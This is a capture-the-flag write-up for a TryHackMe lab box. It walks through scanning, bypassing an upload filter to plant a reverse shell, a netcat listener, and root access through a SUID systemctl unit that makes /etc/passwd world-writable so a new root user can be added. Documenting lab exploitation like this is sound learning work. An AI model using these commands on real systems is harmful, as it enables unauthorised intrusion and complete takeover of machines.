Try Hack Me Vuln-university Write Up!

Let’s Start with Basic Nmap scan.

nmap -A -T4 -p- -sC <ip> -oN scan.nmap

Nmap scan report

Enumeration

Let’s begin with enumerating SMB shares.

SMB shares

so look’s like we are denied access!, never mind we still got other ports to enumerate.

lets move towards web server, its running in port 3333

http://ip:3333/

lets see if there is an hidden directories. You can choose any tool of your choice, as of now we use gobuster.

gobuster dir -u http://ip:3333/ -w /wordlists

  • u switch to specify the URL.
  • -w for wordlist. //provide the path.
gobuster report

/Internal looks interesting .let’s check,

/Internal

Since now we know that we can upload a file. Let's upload a reverse shell and try to connect back.

Burp response

Oops!! looks like its blocking the php files.

Let’s try to bypass the client-side filter by altering the extension. for example you can try using .php5, .php4, phtml also double extension like .php.txt, .php.jpg etc.

Burp response

you can use netcat to set up a listener.

nc -nvlp <port>

Access the file from the browser you must get a reverse shell.

Reverse-shell

you can use the following commands to stabilize the shell.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

for further more stable shell execute the following commands.

export TERM=xterm //gives us access to term commands as clear

stty raw -echo; fg//turns of echo on our terminal which gives us access to auto complete, tab, arrow keys and Ctrl+C.

You can get the user flag but our intension is to root the box, so are you ready for some cool stuffs!! lets Privesc.

Privilege escalation

So the instructions says there is a file with SUID bit that will allow us to escalate privilege.

SUID bit is permission set by root which allows user to run the program but it will be executing it as root.

we can make use of find command to search for the file.

find / -perm -u=s -type f 2>/dev/null

not every file with suid permission can be used to escalate privileges.

looks like systemctl binary can be used. but how i know ..there are some default lists you can check.

how we are going to do this?

systemctl runs the unit files so if we manage to create one of our own and and execute it. Lets do this..

you can refer GTFObins .

chmo=$(mktemp).service //creating our environmental variable.

echo ‘[Service]

ExecStart=/bin/bash -c “chmod 777 /etc/passwd” //executing a command to change permission of passwd file.

[Install]

WantedBy=multi-user.target’ > $chmo

./systemctl link $chmo //linking it to $chmo

./systemctl enable — now $chmo

Now the permission for /etc/passwd should be changed.

Privesc

you can use following command to create a hash.

Openssl passwd -salt 123

here we are using 123 as salt.

upon entering that you’ll be asked for passwd, type the password it’ll generate the hash.

passwd Hash generation.

Now you can write the new user entry on /etc/passwd as,

new:hash:0:0:root:/root:/bin/bash

new//the name of the user

hash //passwd hash

root //name

/root //directory

/bin/bash //shell

help,learn,share.